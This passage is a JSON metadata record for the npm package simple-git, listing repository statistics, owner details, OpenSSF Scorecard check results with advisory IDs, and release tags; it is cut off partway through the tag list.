{"id":2363300,"name":"simple-git","ecosystem":"npm","description":"Simple GIT interface for node.js","homepage":"https://github.com/steveukx/git-js#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/steveukx/git-js","keywords_array":["git","source control","vcs"],"namespace":null,"versions_count":274,"first_release_published_at":"2013-08-09T18:42:16.515Z","latest_release_published_at":"2026-04-12T05:33:05.848Z","latest_release_number":"3.36.0","last_synced_at":"2026-06-03T13:42:35.923Z","created_at":"2022-04-10T00:44:01.216Z","updated_at":"2026-06-04T00:15:21.563Z","registry_url":"https://www.npmjs.com/package/simple-git","install_command":"npm install simple-git","documentation_url":null,"metadata":{"funding":{"type":"github","url":"https://github.com/steveukx/git-js?sponsor=1"},"dist-tags":{"canary":"3.0.2","latest":"3.36.0"}},"repo_metadata":{"id":9861014,"uuid":"11858025","full_name":"steveukx/git-js","owner":"steveukx","description":"A light weight interface for running git commands in any node.js application.","archived":false,"fork":false,"pushed_at":"2026-05-10T20:40:11.000Z","size":11788,"stargazers_count":3836,"open_issues_count":58,"forks_count":335,"subscribers_count":29,"default_branch":"main","last_synced_at":"2026-05-18T16:29:42.859Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/steveukx.png","metadata":{"files":{"readme":"readme.md","changelog":"CHANGELOG.md","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["steveukx"]}},"created_at":"2013-08-03T04:48:11.000Z","updated_at":"2026-05-18T10:07:27.000Z","dependencies_parsed_at":"2024-02-11T09:25:49.630Z","dependency_job_id":"b5768dff-5b63-4d71-aac2-61432fe10d25","html_url":"https://github.com/steveukx/git-js","commit_stats":{"total_commits":991,"total_committers":112,"mean_commits":8.848214285714286,"dds":"0.28153380423814334","last_synced_commit":"a52466d9b5255fdd787a49656ab7ddfa72a122fb"},"previous_names":[],"tags_count":294,"template":false,"template_full_name":null,"purl":"pkg:github/steveukx/git-js","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/steveukx","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/sbom","scorecard":{"id":852903,"data":{"date":"2025-08-11","repo":{"name":"github.com/steveukx/git-js","commit":"789c13ebabcf18ebe0b3a0c88ebb4037dede42e3"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":3.2,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/12 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":4,"reason":"3 commit(s) and 2 issue activity found in the last 90 days -- score normalized to 4","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/changesets.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/ci.yml:10","Warn: no topLevel permission defined: .github/workflows/no-response.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/quality.yml:10","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/changesets.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/steveukx/git-js/changesets.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/changesets.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/steveukx/git-js/changesets.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/changesets.yml:24: update your workflow using https://app.stepsecurity.io/secureworkflow/steveukx/git-js/changesets.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/steveukx/git-js/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/steveukx/git-js/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/no-response.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/steveukx/git-js/no-response.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/quality.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/steveukx/git-js/quality.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/quality.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/steveukx/git-js/quality.yml/main?enable=pin","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   2 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"13 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-h5c3-5r3r-rr8q","Warn: Project is vulnerable to: GHSA-rmvr-2pp2-xj38","Warn: Project is vulnerable to: GHSA-xx4v-prfh-6cgc","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-2p57-rm9w-gvfp","Warn: Project is vulnerable to: GHSA-3f95-r44v-8mrg","Warn: Project is vulnerable to: GHSA-28xr-mwxg-3qc8","Warn: Project is vulnerable to: GHSA-9p95-fxvg-qgq2","Warn: Project is vulnerable to: GHSA-9w5j-4mwv-2wj8","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-23T22:59:39.436Z","repository_id":9861014,"created_at":"2025-08-23T22:59:39.436Z","updated_at":"2025-08-23T22:59:39.436Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":33269230,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-20T15:12:43.734Z","status":"ssl_error","status_checked_at":"2026-05-20T15:12:42.300Z","response_time":356,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"steveukx","name":"Steve King","uuid":"221809","kind":"user","description":null,"email":"","website":null,"location":"London","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/221809?u=f0527fa4e464d753cf78291b386d3c0668e3a4f8\u0026v=4","repositories_count":47,"last_synced_at":"2024-05-01T10:43:55.517Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/steveukx","funding_links":["https://github.com/sponsors/steveukx"],"total_stars":3509,"followers":91,"following":15,"created_at":"2022-11-02T16:27:59.871Z","updated_at":"2024-05-01T10:44:09.793Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/steveukx","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/steveukx/repositories"},"tags":[{"name":"@simple-git/argv-parser@1.1.1","sha":"0e485f7706f61e7b1f8dba7b0d82448d23bc4b53","kind":"tag","published_at":"2026-04-13T20:56:05.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/@simple-git/argv-parser@1.1.1","html_url":"https://github.com/steveukx/git-js/releases/tag/@simple-git/argv-parser@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@%40simple-git%2Fargv-parser%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargv-parser@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargv-parser@1.1.1/manifests"},{"name":"simple-git@3.36.0","sha":"01bb7ceae698831e9abd9310f7d61484970ab53c","kind":"tag","published_at":"2026-04-12T05:33:06.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.36.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.36.0/manifests"},{"name":"@simple-git/argv-parser@1.1.0","sha":"01bb7ceae698831e9abd9310f7d61484970ab53c","kind":"tag","published_at":"2026-04-12T05:33:06.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/@simple-git/argv-parser@1.1.0","html_url":"https://github.com/steveukx/git-js/releases/tag/@simple-git/argv-parser@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@%40simple-git%2Fargv-parser%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargv-parser@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargv-parser@1.1.0/manifests"},{"name":"@simple-git/args-pathspec@1.0.3","sha":"01bb7ceae698831e9abd9310f7d61484970ab53c","kind":"tag","published_at":"2026-04-12T05:33:06.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/@simple-git/args-pathspec@1.0.3","html_url":"https://github.com/steveukx/git-js/releases/tag/@simple-git/args-pathspec@1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@%40simple-git%2Fargs-pathspec%401.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargs-pathspec@1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargs-pathspec@1.0.3/manifests"},{"name":"simple-git@3.35.2","sha":"7dd8c96326e0590c0069a3d9ca801d2cd70348de","kind":"tag","published_at":"2026-04-06T17:11:56.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.35.2","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.35.2/manifests"},{"name":"@simple-git/argv-parser@1.0.3","sha":"7dd8c96326e0590c0069a3d9ca801d2cd70348de","kind":"tag","published_at":"2026-04-06T17:11:56.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/@simple-git/argv-parser@1.0.3","html_url":"https://github.com/steveukx/git-js/releases/tag/@simple-git/argv-parser@1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@%40simple-git%2Fargv-parser%401.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargv-parser@1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargv-parser@1.0.3/manifests"},{"name":"@simple-git/args-pathspec@1.0.2","sha":"7dd8c96326e0590c0069a3d9ca801d2cd70348de","kind":"tag","published_at":"2026-04-06T17:11:56.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/@simple-git/args-pathspec@1.0.2","html_url":"https://github.com/steveukx/git-js/releases/tag/@simple-git/args-pathspec@1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@%40simple-git%2Fargs-pathspec%401.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargs-pathspec@1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargs-pathspec@1.0.2/manifests"},{"name":"simple-git@3.35.1","sha":"93c1f4c7cee7953e8b8797c6905b181f35e0d927","kind":"tag","published_at":"2026-04-06T09:36:56.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.35.1","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.35.1/manifests"},{"name":"@simple-git/argv-parser@1.0.2","sha":"93c1f4c7cee7953e8b8797c6905b181f35e0d927","kind":"tag","published_at":"2026-04-06T09:36:56.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/@simple-git/argv-parser@1.0.2","html_url":"https://github.com/steveukx/git-js/releases/tag/@simple-git/argv-parser@1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@%40simple-git%2Fargv-parser%401.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargv-parser@1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargv-parser@1.0.2/manifests"},{"name":"@simple-git/argv-parser@1.0.1","sha":"ab49d8048cfb62b635e496ad633dee5530d756c1","kind":"tag","published_at":"2026-04-06T09:24:49.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/@simple-git/argv-parser@1.0.1","html_url":"https://github.com/steveukx/git-js/releases/tag/@simple-git/argv-parser@1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@%40simple-git%2Fargv-parser%401.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargv-parser@1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargv-parser@1.0.1/manifests"},{"name":"@simple-git/args-pathspec@1.0.1","sha":"ab49d8048cfb62b635e496ad633dee5530d756c1","kind":"tag","published_at":"2026-04-06T09:24:49.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/@simple-git/args-pathspec@1.0.1","html_url":"https://github.com/steveukx/git-js/releases/tag/@simple-git/args-pathspec@1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@%40simple-git%2Fargs-pathspec%401.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargs-pathspec@1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/@simple-git%2Fargs-pathspec@1.0.1/manifests"},{"name":"simple-git@3.33.0","sha":"ad732e090f753ad5fef5e493558f7b2a2e573ba4","kind":"tag","published_at":"2026-03-10T16:23:10.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.33.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.33.0/manifests"},{"name":"simple-git@3.32.3","sha":"6e61c6493142957dd06703ccc1df496b0c0af34e","kind":"tag","published_at":"2026-02-26T07:55:56.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.32.3","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.32.3/manifests"},{"name":"simple-git@3.32.2","sha":"f8cb7df3feb3c135d2e10803586d64dfe6a2bfe9","kind":"tag","published_at":"2026-02-22T22:10:27.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.32.2","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.32.2/manifests"},{"name":"simple-git@3.32.1","sha":"acbfd1074f8f8ea42c79280fbeab047f91946773","kind":"tag","published_at":"2026-02-21T18:38:30.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.32.1","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.32.1/manifests"},{"name":"simple-git@3.32.0","sha":"c050c1e917590c2e02da6d69e68f70a458304bb1","kind":"tag","published_at":"2026-02-21T13:22:19.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.32.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.32.0/manifests"},{"name":"simple-git@3.31.1","sha":"1402490d14f4125b08f3b2d6c86d3baa0feae6fb","kind":"tag","published_at":"2026-02-14T13:06:08.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.31.1","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.31.1/manifests"},{"name":"simple-git@3.30.0","sha":"9dd70fdb5ee657d8866040cb2c3f5bc87084046e","kind":"tag","published_at":"2025-11-02T08:15:32.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.30.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.30.0/manifests"},{"name":"simple-git@3.28.0","sha":"789c13ebabcf18ebe0b3a0c88ebb4037dede42e3","kind":"tag","published_at":"2025-06-06T07:17:39.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.28.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.28.0/manifests"},{"name":"simple-git@3.27.0","sha":"95c556f3c13cb21061025bdb37c3af197a28c0e9","kind":"tag","published_at":"2024-09-19T12:32:46.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.27.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.27.0/manifests"},{"name":"simple-git@3.26.0","sha":"4297fdc7abcb6062a1b487910b0d921d61abe038","kind":"tag","published_at":"2024-09-01T12:35:28.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.26.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.26.0/manifests"},{"name":"simple-git@3.25.0","sha":"859699d0cc1d0c9b94f53de9c61a060a2cecb656","kind":"tag","published_at":"2024-06-10T10:28:55.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.25.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.25.0/manifests"},{"name":"simple-git@3.24.0","sha":"f5196e9df243e722642f0da877e721c5d32852b1","kind":"tag","published_at":"2024-03-28T19:01:16.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.24.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.24.0/manifests"},{"name":"simple-git@3.23.0","sha":"6e7604f54b5631ff5c63002c1a0f636075a0f701","kind":"tag","published_at":"2024-03-17T08:14:25.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.23.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.23.0/manifests"},{"name":"simple-git@3.22.0","sha":"65b9257572adb30e03bf8f13dc97fd36c84a8b19","kind":"tag","publ